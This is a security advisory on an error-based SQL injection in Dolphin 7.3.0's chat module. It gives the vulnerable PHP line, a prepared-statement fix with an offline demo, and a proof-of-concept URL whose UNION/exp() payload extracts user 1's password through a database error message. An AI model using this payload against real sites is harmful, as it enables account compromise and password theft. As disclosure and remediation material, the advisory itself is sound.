Dolphin 7.3.0 Error Based SQL Injection

Homepage:

https://www.boonex.com/

Description:

The request parameter $_REQUEST['key'] is concatenated into an SQL query without escaping.

File: flash\modules\chat\inc\actions.inc.php

$sKey = isset($_REQUEST['key']) ? $_REQUEST['key'] : "";
$sValue = isset($_REQUEST['value']) ? $_REQUEST['value'] : "";
// $sKey is spliced into the WHERE clause as-is, so quotes in it end the string literal
$aKeys = getArray("SELECT `keys`.`ID` AS `KeyID`, `values`.`ID` AS `ValueID` FROM `" . MODULE_DB_PREFIX . "MembershipsSettings` AS `keys` LEFT JOIN `" . MODULE_DB_PREFIX . "Memberships` AS `values` ON `keys`.`ID`=`values`.`Setting` AND `values`.`Membership`='" . $sId . "' WHERE `keys`.`Name`='" . $sKey . "' LIMIT 1");
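The same lookup rewritten with a prepared statement, as an added example that is not Dolphin's own code: the query text keeps the table and column layout from the snippet above, but the two request-derived values are bound as parameters instead of being concatenated. It assumes a PDO connection and uses an in-memory SQLite database with a constructed table prefix (demo_) and a constructed setting name (demo_setting) so that it runs offline; Dolphin's real MODULE_DB_PREFIX and getArray() helper are not used.

```php
<?php
declare(strict_types=1);

// Constructed sample prefix; the real MODULE_DB_PREFIX is not shown in the advisory.
const DEMO_DB_PREFIX = 'demo_';

function getMembershipSettingIds(PDO $pdo, string $prefix, string $sId, string $sKey): ?array
{
    // Table names cannot be bound, so the prefix is still interpolated; it is an
    // application constant, not request input.
    $sql = 'SELECT `keys`.`ID` AS `KeyID`, `values`.`ID` AS `ValueID`'
         . ' FROM `' . $prefix . 'MembershipsSettings` AS `keys`'
         . ' LEFT JOIN `' . $prefix . 'Memberships` AS `values`'
         . ' ON `keys`.`ID` = `values`.`Setting` AND `values`.`Membership` = :membership'
         . ' WHERE `keys`.`Name` = :name LIMIT 1';

    $stmt = $pdo->prepare($sql);
    // Both request-derived values travel as bound parameters: the database
    // receives them as data, so quotes, UNION or comment sequences inside them
    // never change the structure of the statement.
    $stmt->bindValue(':membership', $sId, PDO::PARAM_STR);
    $stmt->bindValue(':name', $sKey, PDO::PARAM_STR);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Offline demo schema (constructed) mirroring only the columns the query touches.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `' . DEMO_DB_PREFIX . 'MembershipsSettings`'
         . ' (`ID` INTEGER PRIMARY KEY, `Name` TEXT NOT NULL)');
$pdo->exec('CREATE TABLE `' . DEMO_DB_PREFIX . 'Memberships`'
         . ' (`ID` INTEGER PRIMARY KEY, `Setting` INTEGER NOT NULL, `Membership` INTEGER NOT NULL)');
$pdo->exec("INSERT INTO `" . DEMO_DB_PREFIX . "MembershipsSettings` VALUES (1, 'demo_setting')");
$pdo->exec('INSERT INTO `' . DEMO_DB_PREFIX . 'Memberships` VALUES (7, 1, 1)');

// Legitimate lookup: the matching KeyID/ValueID pair comes back.
var_dump(getMembershipSettingIds($pdo, DEMO_DB_PREFIX, '1', 'demo_setting'));

// An injection-shaped key is now just a setting name that does not exist:
// the lookup returns null instead of running an attacker-supplied subquery.
var_dump(getMembershipSettingIds($pdo, DEMO_DB_PREFIX, '1', "' UNION SELECT 1, 2 -- a"));
```

The same function works unchanged against MySQL through PDO's mysql driver, where the server receives the bound values separately from the statement text. Because the set of valid setting names is finite and known to the application, checking the incoming key against that list before the query is a cheap second layer, and the database error text should not be echoed back to the client, since the advisory's response shows that error messages alone leak query results.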

Proof of Concept:

To retrieve the password of user id=1:

http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a

The server responds with:

Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>

Timeline: